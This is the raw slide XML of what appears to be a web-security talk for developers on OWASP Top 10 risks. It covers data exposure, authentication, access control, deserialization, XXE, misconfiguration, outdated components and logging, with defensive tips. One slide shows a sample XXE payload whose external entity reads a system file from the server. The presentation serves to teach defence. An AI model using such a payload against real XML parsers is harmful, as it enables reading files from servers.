          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Picture 3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1AF1594-889C-4A8A-84B8-320F1103B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3487" y="5101130"/>
                <a:ext cx="9725025" cy="636270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BA63E8-7CEA-4F86-B8E4-44C4471A50BC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1568867" y="4731798"/>
                <a:ext cx="57285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yriad Pro" panose="020B0503030403020204" pitchFamily="34" charset="0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7ECAF6-9251-43BD-8D01-197778815787}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2375613" y="2641600"/>
              <a:ext cx="1767840" cy="17678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D38FFE-2D47-4700-9536-346201DF5B99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5567680" y="2879188"/>
              <a:ext cx="46939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  <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Naathan</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/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Birthday: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>15/01/1992</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:b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Shipping Address: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>789, Baz </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>straße</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Darmsdart</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:b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FA6C7-FFDC-42AF-8478-426DE82A12CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="83100" y="3180080"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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56A959-FB74-4D94-8191-FEFB1957D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665025-6A96-420F-8FEE-17F3411F2F03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5666237" y="2710151"/>
              <a:ext cx="371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Sensitive data exposure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17004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2F1CBE8-BEA7-4327-9FC0-8DF07C871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32" y="-1"/>
            <a:ext cx="12386432" cy="7338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7C6DD6-AFE7-44F7-B0D2-B3112B2DA9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21184971">
            <a:off x="5302528" y="3233284"/>
            <a:ext cx="1822915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1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8C100"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="8100000" algn="tr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Myriad Pro Light" panose="020B0603030403020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:cs typeface="CordiaUPC" panose="020B0502040204020203" pitchFamily="34" charset="-34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77782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F4FB9CC-89B9-4D6A-AD3B-83AF3F31B05E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1233487" y="1092287"/>
            <a:ext cx="9725025" cy="6732032"/>
            <a:chOff x="1233487" y="4731798"/>
            <a:chExt cx="9725025" cy="6732032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1AF1594-889C-4A8A-84B8-320F1103B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487" y="5101130"/>
              <a:ext cx="9725025" cy="63627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BA63E8-7CEA-4F86-B8E4-44C4471A50BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1568867" y="4731798"/>
              <a:ext cx="5728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3D62733-3F20-4737-845C-5623D813F364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330960" y="722955"/>
            <a:ext cx="436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https://site.noob/user/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23453</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/edit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ECAF6-9251-43BD-8D01-197778815787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2375613" y="2641600"/>
            <a:ext cx="1767840" cy="176784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38FFE-2D47-4700-9536-346201DF5B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567680" y="2879188"/>
            <a:ext cx="469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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naathan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Birthday: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15/01/1992</a:t>
            </a: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Shipping Address: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>789, Baz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>straße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Darmsdart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27271-C77F-4C9C-92E9-10B5646B0715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268720" y="2932310"/>
            <a:ext cx="3992880" cy="2477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AE8E95-818C-481C-8B34-531C06614F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512560" y="3221422"/>
            <a:ext cx="3749040" cy="207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86F1A-BEB4-4C68-ABB2-E206D102696F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386320" y="3518932"/>
            <a:ext cx="2875280" cy="207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26B336-8B1C-4E94-B3DC-9DC4FA27BD48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6836781" y="-241627"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="3785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58FF123-3133-4556-9848-BC9DA7167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724877-0B57-4475-99E7-7840F7AD6A07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5815818" y="2706948"/>
              <a:ext cx="3549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Broken Authentication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B12766-F407-44B5-B177-7145FE8A5D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="119957" y="3072348"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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5B7581-4CFF-40DE-86D6-6B56FE26A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380899-08A6-43B9-B41D-0A19DA4A61E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5815818" y="2706948"/>
              <a:ext cx="3496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Broken Access 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99436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C0E1B0-EDBB-4374-B705-A9BD99BA8E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524436" y="1228397"/>
            <a:ext cx="94243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 is a stateless protocol. Always check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the  user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Check if the current user is allowed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to modify the given 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Hash user passwords with a secure salt: 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Bcrypt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Argon2ID.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invent your own crypto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 everywhere</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16735511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5117234" y="192617"/>
            <a:ext cx="195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TOP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3D13B-EA9D-4AFC-9495-9A8E2D3BF411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076960" y="1422400"/>
            <a:ext cx="4438203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Cross Site Scripting (XSS)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Secure Data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52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1874F-FB4E-44E3-AE44-FA470A1BF5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740258" y="2959640"/>
            <a:ext cx="471148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Swedish Things</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1128040413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D05267-B7A2-4CA3-8599-1A59FA4FD65E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196788" y="2875002"/>
            <a:ext cx="1852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</a:rPr>
              <a:t>Pewdiepie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88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173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73BC4-F69D-4C59-9212-246162812A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360157" y="3244334"/>
            <a:ext cx="14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want a table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19092819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973BC4-F69D-4C59-9212-246162812A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360157" y="891099"/>
            <a:ext cx="14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want a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F9B6A-CA10-4677-B0AB-D9AB7211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3" y="2501153"/>
            <a:ext cx="2883285" cy="1855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2D542-4837-4F4B-9C29-39015EA4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16" y="2088216"/>
            <a:ext cx="2681568" cy="2681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1069D-ECEE-4D1F-80C4-1161AB44E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56" y="2020981"/>
            <a:ext cx="3144371" cy="314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249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342B8-F069-4BBC-B0C7-D2B154DDC07D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3697715" y="618564"/>
            <a:ext cx="479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Serialize and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1AFD-7AC2-4F08-A46E-45D39B958693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678271" y="2228671"/>
            <a:ext cx="2210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Tobias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age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26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37DF4-1491-4225-A0F0-B354FBE0129B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678271" y="4222376"/>
            <a:ext cx="2970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 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'name'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'Tobias’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 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'age'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8C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>26</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808030"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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C0D4E-B4AE-490D-96C7-DF2979D7FFE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163133" y="3244334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{name: "Tobias", age: 26}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055450-F087-431C-9E8E-7D5A1A9FF77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20882126">
            <a:off x="4665809" y="2980730"/>
            <a:ext cx="2581835" cy="3693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BCD95C-4308-45EC-AF82-AC97DFA4AE30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="862347">
            <a:off x="4670610" y="3928324"/>
            <a:ext cx="2581835" cy="369332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0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342B8-F069-4BBC-B0C7-D2B154DDC07D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3697715" y="618564"/>
            <a:ext cx="479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Serialize and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C1AFD-7AC2-4F08-A46E-45D39B958693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678271" y="2228671"/>
            <a:ext cx="22108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{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name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“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Nadine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age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26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}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37DF4-1491-4225-A0F0-B354FBE0129B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678271" y="4222376"/>
            <a:ext cx="29706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array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(</a:t>
            </a:r>
          </a:p>
          <a:p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 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'name'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‘Nadine’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 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'age'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=&gt;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8C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>26</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808030"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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C0D4E-B4AE-490D-96C7-DF2979D7FFE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163133" y="3244334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{name: “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Nadine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", age: 26}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055450-F087-431C-9E8E-7D5A1A9FF77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20882126">
            <a:off x="4665809" y="2980730"/>
            <a:ext cx="2581835" cy="3693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BCD95C-4308-45EC-AF82-AC97DFA4AE30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="862347">
            <a:off x="4670610" y="3928324"/>
            <a:ext cx="2581835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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36E97F-5278-4607-8C5A-6FC70CB02D59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="160298" y="3165396"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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447E10-B573-4E7A-86C8-E38306F8B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5A73BC-5687-473A-A2A9-BC55919E9521}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5815818" y="2706948"/>
              <a:ext cx="37303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Insecure Deserialization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80139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Wor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building, woman&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED556E0-3E54-48B2-A9D0-DD815CDB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81" y="219075"/>
            <a:ext cx="92486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50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3697715" y="618564"/>
            <a:ext cx="4796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Serialize and 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524436" y="1843950"/>
            <a:ext cx="91035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Validate user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Validate data tampering with signatures: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HMAC, Digital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PHP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ZIP bombs,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19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342B8-F069-4BBC-B0C7-D2B154DDC07D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4822638" y="618564"/>
            <a:ext cx="2546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XML Parsing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BC0D4E-B4AE-490D-96C7-DF2979D7FFE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619966" y="2967335"/>
            <a:ext cx="8289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&lt;?</a:t>
            </a:r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xml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74726"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>version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7D0045"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1.0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74726"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808030"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=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00E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ISO-8859-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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?&gt;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&lt;!</a:t>
            </a:r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DOCTYPE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BB7977"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo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[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&lt;!</a:t>
            </a:r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ELEMENT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BB7977"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo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ANY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&gt;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&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTITY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 err="1">
                <a:solidFill>
                  <a:srgbClr val="BB7977"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe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SYSTEM "file:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/etc/password"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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004A43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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5035"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo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>
                <a:solidFill>
                  <a:srgbClr val="074726"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="074726"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="074726"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5035"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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en-US" sz="4000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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1F03EC-8E18-4D34-B077-AF60C1AEF2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-256561" y="3429000"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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346E2D-ED40-4677-9C2A-0182945F9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BF77F-2DA5-4D10-AFE3-D5449A5005AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5571462" y="2840083"/>
              <a:ext cx="4183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XML External Entities (XXE)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16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60B4481-7347-4561-A357-E29C5F811790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5117234" y="192617"/>
            <a:ext cx="195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TOP 10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3D13B-EA9D-4AFC-9495-9A8E2D3BF411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076960" y="1422400"/>
            <a:ext cx="4757584" cy="7940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Cross Site Scripting (XSS)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Secure Data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Broken Access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Insecure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Unserialization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rPr>
              <a:t>XML External Entities (XXE)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23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>
        <p159:morph option="byObject"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback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3443543" y="618564"/>
            <a:ext cx="530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misconfigurations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524436" y="1843950"/>
            <a:ext cx="106027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error log messages from end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all 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Disable insecure protocols: SSLv3, MD5 hashing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Running outdated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PHP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 database dumps, zip files,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Default passwords, password reuse, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346611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3443543" y="618564"/>
            <a:ext cx="530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misconfigurations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524436" y="1843950"/>
            <a:ext cx="106027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Hide error log messages from end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all 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Disable insecure protocols: SSLv3, MD5 hashing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Running outdated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PHP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unserialize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()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 database dumps, zip files,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Default passwords, password reuse, etc.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D1D552-00B7-413D-83B1-BB687D33CB98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6251816" y="2151726"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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7A35A5-FED7-4C04-9C26-F52EB7F58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468B8C-49CF-4CC0-B1B6-A971B5199796}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5571462" y="2840083"/>
              <a:ext cx="4011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Security Misconfiguration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6053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2165981" y="612845"/>
            <a:ext cx="7860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 with known vulnerabilities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457201" y="2151727"/>
            <a:ext cx="8951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versions that get security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CI/CD process to test all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semantic versioning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`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composer update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` for PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3430520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2165981" y="612845"/>
            <a:ext cx="7860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 with known vulnerabilities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457201" y="2151727"/>
            <a:ext cx="8951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versions that get security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 CI/CD process to test all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semantic versioning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`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composer update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` for PHP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F141F9-581A-46AD-B740-E1899E57795A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6251816" y="2151726"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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07F179-BEB7-4B3C-A3E3-AAB8BFB7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6D3474-B719-4D58-85AF-30E7173A68E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5836275" y="2652696"/>
              <a:ext cx="39939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Components with Known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Vulnerabilities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308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4085706" y="607125"/>
            <a:ext cx="402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Insufficient Logging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524436" y="1843950"/>
            <a:ext cx="75134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analyzers to find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stack traces where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web server 404, 403,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Append-only logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1475255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43B06C-04B7-4159-8F3C-11870C952D4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
